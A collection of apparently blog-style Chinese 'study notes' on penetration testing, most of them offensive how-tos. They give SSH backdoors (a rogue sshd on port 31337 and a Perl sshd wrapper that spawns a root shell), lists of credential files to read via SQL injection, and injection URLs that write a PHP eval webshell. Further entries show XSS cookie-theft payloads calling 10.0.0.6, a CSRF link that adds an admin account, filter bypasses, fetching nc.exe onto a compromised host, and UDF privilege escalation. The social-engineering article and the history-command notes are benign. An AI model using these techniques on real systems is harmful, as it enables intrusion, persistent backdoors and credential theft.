学习笔记

渗透技巧之SSH篇

渗透技巧之SSH篇
1、入侵得到SHELL后,想快速开放一个可以访问的SSH端口ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。2、做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接肉鸡上执行:[root@localhost ~]# cd /usr/sbin [root@localhost sbin]# mv sshd ../bin [root@localhost sbin]# echo '#!/usr/bin/perl' >sshd [root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd [root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd [root@localhost sbin]# chmod u+x sshd [root@localhost sbin]# /etc/init.d/sshd restart自己机器上执行socat STDIO TCP4:10.18.180.20:22,sourceport=133773、记录SSH客户端连接密码效果图... 继续阅读 »
学习笔记

load_file()常加载的文件

load_file()常加载的文件
 load_file()查看常用的一些配置文件/usr/local/apache/htdocs/comm/config.php/usr/local/app/apache2/conf/httpd.conf            //apache2缺省配置文件/usr/local/app/apache2/conf/extra/httpd-vhosts.conf              //虚拟网站设置/usr/local/apache2/conf/httpd.conf/etc/httpd/conf/httpd.conf apache                                配置文件/etc/rsyncd.conf                                                 同步程序配置文件/etc/sysconfig/network-scripts/ifcfg-eth0                         察看IP./usr/local/app/php5/lib/php.ini                                 //PHP相关设置ect/password/etc/my.cnf                                                     //mysql的配置文件/etc/redhat-release                                             //系统版本/etc/sysconfig/iptables                                         //从中得到防火墙规则策略/etc/my.ini/etc/php5/apache2/php.ini information_schema  读取mysql表c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.iniC:\Program Files\Serv-U\ServUDaemon.inic:\windows\my.iniC:\WINDOWS\system32\inetsrv\MetaBase.xml                        IIS配置文件c:\boot.iniC:\mysql\data\mysql\user.MYD                                    //存储了mysql.user表中的数据库连接密码c:\windows\php.inic:\php.initemp                                                            缓存里面储存的信息c:\windows\repair\sam                                            存储了WINDOWS系统初次安装的密码c:\Program Files\ Serv-U\ServUAdmin.exe                         6.0版本以前的serv-u管理员密码存储于此c:\Program Files\RhinoSoft.com\ServUDaemon.exeC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件 D:\MySQL DataFiles\mysql\user.MYD... 继续阅读 »
学习笔记

into outfile的高级运用

into outfile的高级运用
获得物理路径(into outfile '物理路径') 这样才能写对目录能够使用union (也就是说需要MYSQL3以上的版本)对方没有对’进行过滤(因为outfile 后面的 '' 不可以用其他函数代替转换)就是MYSQL用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)对web目录有写权限MS的系统一般都有权限,但是LINUX通常都是rwxr-xr-x 也就是说组跟其他用户都没有权限写操作.这里的1,我们一般可以靠数据库出错信息来爆出来,不行的话,也可以通过load_file()来得到.2那是一般都可以的了...3也不多见对'''过滤的.4有没有权限,我们前面已经测试过的了.5如果不能备份到网站的路径上来,我们也还有别的办法,譬如到starup,run里面去等等社工的办法.而且一般多试试上传目录,图片目录,还是大部分都有读写权限的.OK.需要的条件确定了,那怎么用呢?我们分开两部来说用法.用法1:这是中规中矩的用法,大家都知道.就是采用网站有的留言,上传等功能,把你的一句话马弄上去,然后使用CODE:http://www.tian6.com/coder.php?id=1 and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile '/www/home/html/coder.php'/* 你的小马就诞生了.其中/www/home/html/upload/qingyafengping.jpg为你已上传的木马地址.3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.用法2,也是重点要说的.上面的方法,局限性还是比较大的,如果网站不给你上传,或者网站过滤上传的内容,那怎么办?不用怕,剑心早在几年前就给我们想到了个好办法.我们只需要直接这么执行URL:CODE:http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,char(这里是你的马的代码,记得转为10进或者16进),3,4,5,6 into outfile '/www/home/html/coder.php'/* 这样你的小马也诞生了,不需要上传,也不怕他过滤.譬如CODE:http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'/*或者http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*或者http://www.tiany6.com/coder.php?id=1 and 1=2 union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/www/home/html/coder.php'/*3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.... 继续阅读 »
学习笔记

2015-8-24 XSS笔记

2015-8-24 XSS笔记
XSS的危害挂马-挂链盗取用户cookie等隐私信息-账号被盗利用XMLHttpRequest对象读取本地敏感文件-盗取本地保存的账号密码键盘监控-使用一些事件监听DoS客户端浏览器-死循环钓鱼攻击-插登录框针对性的XSS病毒,恶意篡改数据.-POST,GET转账,刷钱劫持用户Web行为,进一步渗透内网.-爆发Web2.0蠕虫蠕虫式DDoS攻击……短网址生成:http://dwz.aidmin.cn/ http://dwz.cn/ 有的时候XSS的Payload有长度限制,短网址可以解决。利用XSS代码构建GET构建请求进行CSRF攻击:常X的标签:<link href=“”><img src=“”><img lowsrc=“”><img dynsrc=“”><meta http-equiv=“refresh” content=“0; url=”><iframe src=“”><frame src=“”><script src=“”><bgroup src=“”><embed src=“”>GET盗取Cookie:<a src="http://10.0.0.6/xss/?u=c8bbc2"></a><script src="" _src="http://10.0.0.6/xss/?u=c8bbc2"˃"˃http://10.0.0.6/xss/?u=c8bbc2"></script> 或者短网址处理下:<a src="" _src="http://dwz.cn/124bs8"˃"˃http://dwz.cn/124bs8"> apple</a>构建GET请求代替POST请求的实现操作:POSTURL:http://10.0.0.6:98/source/admin/Admin_add.asp?action=save数据:uid=1&realname=admin&pwd1=admin&pwd2=admin&Submit2=%C8%B7%C8%CF%CC%ED%BC%D3构造GET请求:http://10.0.0.6:98/source/admin/Admin_add.asp?action=save&uid=121&realname=121&pwd1=admin&pwd2=admin&Submit2=%C8%B7%C8%CF%CC%ED%BC%D3生成短网址:http://dwz.cn/129wZp payload:<img src="" _src="http://dwz.cn/129wZp"˃"˃http://dwz.cn/129wZp"></img> 管理员一旦登陆,即可自动添加一账号.绕过过滤方法<sCriPt> Example%00<script> <script/src=…> <scr%00ipt> %3cscript%3e %253cscript%253e <scri<script>pt>... 继续阅读 »
学习笔记

TK教主之-TrueCrypt虚拟磁盘文件保护

TK教主之-TrueCrypt虚拟磁盘文件保护
... 继续阅读 »
学习笔记

TK教主之U盘病毒解决方法

TK教主之U盘病毒解决方法
... 继续阅读 »
学习笔记

黑客社会工程学攻击的八种常用伎俩

黑客社会工程学攻击的八种常用伎俩
黑客社会工程学攻击的八种常用伎俩2010-08-20 13:35出处:安全在线[导读]著名黑客Kevin Mitnick在上世纪90年代让"黑客社会工程学"这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了。专家们认为,如今的黑客仍在继续采用黑客社会工程学的新老伎俩盗窃密码、安装恶意软件或者攫取利益。  著名黑客Kevin Mitnick在上世纪90年代让"黑客社会工程学"这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了。专家们认为,如今的黑客仍在继续采用黑客社会工程学的新老伎俩盗窃密码、安装恶意软件或者攫取利益。  此处所列的是一些最流行的利用电话、email和网络的社会工程学攻击伎俩。  1. 十度分隔法  利用电话进行欺诈的一位社会工程学黑客的首要任务,就是要让他的攻击对象相信,他要么是1)一位同事,要么是2)一位可信赖的专家(比如执法人员或者审核人员)。但如果他的目标是要从员工X处获取信息的话,那么他的第一个电话或者第一封邮件并不会直接打给或发给X。  在社会心理学中,六度分隔的古老游戏是由很多分隔层的。纽约市警察局的一位老资格探员Sal Lifrieri,如今正定期举办一个叫做"防范性运营"的企业培训课程,教授如何识别黑客穿透某个组织的社会工程学攻击手段。他说,黑客在一个组织中开始接触的人可能会与他所瞄准的目标或人隔着十层之远。  "我讲课时不断地在告诫人们,多少得具备一些放人之心,因为你不知道某人到底想从你这儿获得什么,"Lifrieri说。渗透进入组织的起点" 可能是前台或门卫。所以企业必须培训员工彼此相识。而作为犯罪起点的秘书或者前台距离犯罪分子真正想接近的目标有可能隔着十层之远。"  Lifrieri说,犯罪分子所用的方法很简单,就是奉承某个组织里更多可以接近的人,以便从职务更高的人那里获得他们所需的信息。  "他们常用的技巧就是伪装友好,"Lifrieri说。"其言辞有曰:‘我很想跟您认识一下。我很想知道在您的生活中哪些东西是最有用的。'然后他们很快就会从你那里获得很多你原本根本不会透露的信息。"  2. 学会说行话  每个行业都有自己的缩写术语。而社会工程学黑客就会研究你所在行业的术语,以便能够在与你接触时卖弄这些术语,以博得好感。  "这其实就是一种环境提示,"Lifrieri说,"假如我跟你讲话,用你熟悉的话语来讲,你当然就会信任我。要是我还能用你经常在使用的缩写词汇和术语的话,那你就会更愿意向我透露更多的我想要的信息。"  3. 借用目标企业的"等待音乐"  Lifrieri说,成功的骗子需要的是时间、坚持不懈和耐心。攻击常常是缓慢而讲究方法地进行的。这不仅需要收集目标对象的各种轶事,还要收集其他的"社交线索"以建立信任感,他甚至可能会哄骗得你以为他是你还未到这家企业之前的一位同事。  另外一种成功的技巧是记录某家公司所播放的"等待音乐",也就是接电话的人尚未接通时播放的等待乐曲。  "犯罪分子会有意拨通电话,录下你的等待音乐,然后加以利用。比如当他打给某个目标对象时,他会跟你谈上一分钟然后说:‘抱歉,我的另一部电话响了,请别挂断,'这时,受害人就会听到很熟悉的公司定制的等待音乐,然后会想:‘哦。此人肯定就在本公司工作。这是我们的音乐。'这不过是又一种心理暗示而已。"  4. 电话号码欺诈  但最分子常常会利用电话号码欺诈术,也就是在目标被叫者的来电显示屏上显示一个和主叫号码不一样的号码。  "犯罪分子可能是从某个公寓给你打的电话,但是显示在你的电话上的来电号码却可能会让你觉得好像是来自同一家公司的号码,"Lifrieri说。  于是,你就有可能轻而易举地上当,把一些私人信息,比如口令等告诉对方。而且,犯罪分子还不容易被发现,因为如果你回拨过去,可能拨的是企业自己的一个号码。  5. 利用坏消息作案  "只要报纸上已刊登什么坏消息,坏分子们就会利用其来发送社会工程学式的垃圾邮件、网络钓鱼或其它类型的邮件,"McAfee Avert实验室的安全研究主任Dave Marcus说。  Marcus说,他们的实验室在这次的美国总统大选和经济危机中看到了此类活动的增多趋势。  "有大量的网络钓鱼攻击是和银行间的并购有关的,"Marcus说。"钓鱼邮件会告诉你说,‘你的存款银行已被他们的银行并购了。请你点击此处以确保能够在该银行关张之前修改你的信息。'这是诱骗你泄露自己的信息,他们便能够进入你的账户窃取钱财,或者倒卖储户的信息。"  6. 滥用网民对社交网站的信任  Facebook、MySpace和LinkedIn都是非常受欢迎的社交网站。很多人对这些网站十分信任。而最近的一次钓鱼欺诈事件就瞄上了LinkedIn的用户,这次攻击让很多人感到震惊。Marcus说,已经有越来越多的社交网站迷们收到了自称是Facebook网站的假冒邮件,结果上了当。  "用户们会收到一封邮件称:‘本站正在进行维护,请在此输入信息以便升级之用。'只要你点进去,就会被链接到钓鱼网站上去。"Marcus因此建议人恩最好手工输入网址以避免被恶意链接。并应该记住,很少有某个网站会寄发要求输入更改口令或进行账户升级的邮件。  7. 输入错误捕获法  犯罪分子还常常会利用人们在输入网址时的错误来作案,Marcus说。比如当你输入一个网址时,常常会敲错一两个字母,结果转眼间你就会被链接到其他网站上去,产生了意想不到的结果。  "坏分子们早就研究透了各种常见的拼写错误,而他们的网站地址就常常使用这些可能拼错的字母来做域名。"  8. 利用FUD操纵股市  一些产品的安全漏洞,甚至整个企业的一些漏洞都会被利用来影响股市。根据Avert的最新研究报告,例如微软产品的一些关键性漏洞就会对其股价产生影响,每一次有重要的漏洞信息被公布,微软的股价就会出现反复的波动。  "公开披露信息肯定会对股价产生影响,"Marcus说。"另有一个例子表明,还有人故意传播斯蒂夫·乔布斯的死讯,结果导致苹果的股价大跌。这是一个利用了FUD(恐慌、不确定、怀疑),从而对股价产生作用的明显事例。"  当然,反向操纵的手法也会发生,这很像以前的所谓"哄抬股价"的伎俩。垃圾邮件的发送者会购买大量的垃圾股,然后伪装成投资顾问疯狂发送邮件,兜售所谓的"潜力股"。如果有足够多的邮件接收者相信了这一骗局并购买了这种垃圾股,其股价就会被哄抬起来。而始作俑者便会迅速卖空获利。... 继续阅读 »
学习笔记

history的作用

history的作用
historylinux的history命令的作用是,记录执行过的命令。用法:history [n]  n为数字,列出最近的n条命令-c  将目前shell中的所有history命令消除,这样就不能用方向键上翻之前执行的命令了。history [-raw] histfiles-a 将目前新增的命令写入histfiles, 默认写入~/.bash_history   这个文件记录了执行过的历史命令-r  将histfiles内容读入到目前shell的history记忆中,读取后 history就可以看到有记录了,并且方向键也可以上下翻到命令了。-w 将目前history记忆的内容写入到histfiles ,更新记录文件 使用! 执行历史命令![n]例如 :!2 => 执行history中记录的第二条命令!cat => 执行history中记录的最近的cat开头的命令!! => 执行上一条命令 查看history记录行数echo $HISTSIZE  配置行数记录:配置文件在/etc/profile中修改HISTSIZE=1000export  HISTSIZE想要让linux的history命令显示时间,history是默认不带时间,在/etc/profile 中增加export HISTTIMEFORMAT="%y-%m-%d %H:%M:%S "修改后:history查看效果:参考:http://blog.csdn.net/yonggang7/article/details/40710623... 继续阅读 »
学习笔记

内外渗透技巧

内外渗透技巧
能执行命令,但是不能直接上传文件怎么破?         window:ftp下载-wget.exe文件使用    ftp -s:d:\ftp.txt下载文件:    echo open xxx.xxx.xxx.xxx>>d:\ftp.txt    echo admin>>d:\ftp.txt    echo 123456>>d:\ftp.txt    echo get nc.exe d:\nc.exe>>d:\f.txt    echo bye >>d:\ftp.txt         Linux: wget下载 LCX转其他服务器的端口... 继续阅读 »
学习笔记

2015-7-28 提权

2015-7-28 提权
1、系统漏洞提权微软: MS08067 MS: Micosoft的缩写08: 表示年份,即 2008年发布的漏洞067: 表示顺序,即当年发布的第67个漏洞2、如何知道使用哪个EXP?使用systeminfo查看补丁目录,查看补丁记录,判断哪个补丁没打,使用对应的EXP进行提权Windows Linux系统提权 用各种EXP打3、数据库提权原理:启动数据库的账号是高权限账号,使用数据库执行系统命令相当于使用高权限账号使用系统命令,提权也属于权限继承类提权。MYSQL: UDF 提权适用场景:Windows 2000,XP,Win2003能够对数据库表INSERT 和 DELETE权限MYSQL最好默认启动权限是system (Linux默认是mysql用户)UDF 提权方法:1、获取当前MySQL的一个数据库连接信息,通常包含地址、端口、账号、密码、库名等五个信息。2、上传UDF提权用的DLL,并进行数据库连接。3、连接成功后,导出DLL文件。select * from outfile 'aaaa.dll'4、使用SQL语句创建自定义函数 5、通过SQL语句调用创建的函数6、删除函数和dll4. DLL劫持提权  每一个文件在开始运行时都要寻找各种它需要的DLL(动态链接库),来满足程序的功能和需求。但是有一个特性,就是每个EXE运行前都要寻找一个名为LPK.DLL的文件,并执行它。优先搜寻当前目录下的DLL加载,然后再到系统目录下去加载:LPK.dll5. python交互式bash... 继续阅读 »